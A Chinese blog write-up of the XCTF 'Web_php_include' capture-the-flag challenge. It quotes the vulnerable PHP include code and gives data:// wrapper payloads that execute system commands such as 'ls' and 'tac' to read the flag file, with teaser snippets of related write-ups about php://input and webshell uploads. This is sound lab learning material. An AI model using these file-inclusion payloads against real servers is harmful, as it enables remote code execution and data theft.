攻防世界web高阶(web_php_include)

最新推荐文章于 2024-10-13 10:33:10 发布
最新推荐文章于 2024-10-13 10:33:10 发布
阅读量699 收藏
点赞数
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ctfmove1/article/details/107377654
版权

payload:不过滤大小写,让page=php://
?page=data:text/plain,<?php system("ls") ?>
?page=data:text/plain,<?php system("tac fl4gisisish3r3.php") ?>
data伪协议

本例特殊之处在于: 知道文件, 但是 调用 cat、tail、 less、more 并不能显示文件内容,但是 有一个命令 tac:将文件全部内容从尾到头反向连续输出到标准输出(屏幕)上
通过代码知道是文件包含漏洞
https://blog.csdn.net/Vansnc/article/details/82528395(漏洞分析的网址)

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];		/$page变量等于网页获取到的page)
while (strstr($page, "php://")) {		/(判断php://是否出现在page变量中,这个函数对大小写敏感)
    $page=str_replace("php://", "", $page);		/(把$page变量中的php://替换成空格,“”就是空格)
}
include($page);
?>

payload:?page=data:text/plain,<?php system("ls");?>	看文件目录
	?page=data:text/plain,<?php system("文件名字");?>	f12源码里有flag
ctfmove
关注
专栏目录
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3727
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
【网络安全 | CTF攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 515
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1358
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界18-Web_php_include-CTFWeb进阶
最新发布
LH1013886337的博客
10-13 303
看名字可能是文件包含的题和。
攻防世界-web-Web_php_include
wuh2333的博客
05-18 236
攻防世界php_web_include
攻防世界web进阶区——Web_php_include
一枚菜鸡
10-18 604
一、基本方法:大小写绕过 考察的是文件包含,page中带有php://的都会被替换成空,str_replace()以其他字符替换字符串中的一些字符(区分大小写),strstr() 查找字符串首次出现的位置。返回字符串剩余部分。 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", ""
攻防世界WebWeb_php_wrong_nginx_config
Light_inthe_eyes的博客
11-03 2056
首先进来是一个登录页面: 通过御剑扫描,发现了robots.txt,打开发现两个php文件: hint.php: Hack.php是跳转到登录页面: 抓包看看Hack.php,发现了可疑的点Cookie:isLogin=0,不妨修改为1,进入控制中心: 发现url中file=index&ext=php,不妨测试一下../,发现这里过滤了../: 绕过../,根据hint.php可以知道配置文件的路径,那就构造payload:file=....//....//....//....//etc/nginx
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 513
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界 WEB Web_python_flask_sql_injection
qq_41696858的博客
12-13 1063
没啥好说的,题目已经把几个关键点给出来了,flask,sql注入,还给了源码 那么就是源码审计,这题sql注入的点属实是有点多,普通的也有,难的也有,也难怪他是个九分题 干就完了,下载源码,第一个注入点是routes.py里面的index路由项 res = mysql.Add("post", ['NULL', "'%s'" % form.post.data, "'%s'" % current_user.id, "'%s'" % now()])
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 1900
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3326
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
攻防世界XCTFWeb_php_include
末初的CSDN博客
03-13 889
这里需要绕过strstr()函数查找字符,使用php伪协议,不然会被替换为空。 针对strstr()函数对大小写敏感,绕过使用php://input流 也就是说,如果使用php://input 我们传入的数据就能相当于以post包的形式,传入php变量执行。 Cat fl4gisisish3r3.php查看内容 ...
【XCTF 攻防世界WEB 高手进阶区 Web_php_include
weixin_45844670的博客
08-23 1734
目录基础题解本题相关知识点:一题多解:**php文件包含****一句话木马****data://伪协议**data://伪协议+一句话木马 基础题解 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 上面这段
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4832
ctf学习记录
青少年CTF-qsnctf-Web-include01&include02(多种方法-知识点较多-建议收藏!)
m0_73734159的博客
12-23 1902
php://data协议是PHP中的一种特殊协议,可以在包含函数中被用来执行一些特殊的操作。它没有条件限制,但仅能用于在CTF(Capture The Flag)中读取本地文件,且不受allow_url_fopen与allow_url_include的影响。php://input是PHP提供的一个伪协议,允许开发者访问POST请求的原始内容。因为根目录下只有flag这一个f开头的文件 所以查看的就是flag文件的内容咯。题目描述:你能否获取Flag呢,flag格式为:qsnctf{xxx}。
ctfshow web3
hintll的博客
06-09 244
ctfshow web3
CTFSHOW web第三关--文件包含和php伪代码
weixin_46915877的博客
05-07 269
其中常用的是PHP伪协议。简单理解这个伪协议,是由两部分构成:1.php://input 2.post的主体数据。通过1把我们的2当做php代码执行。接下来我们来试试看。提示很明显,源码直接告诉我们是一个文件包含漏洞。结果很明显,我们来看下ctf...这个url。然后修改下~这里要注意,主体部分要和请求头分开一行!
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种漏洞,应该对包含的文件进行严格验证,确保只包含可信的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值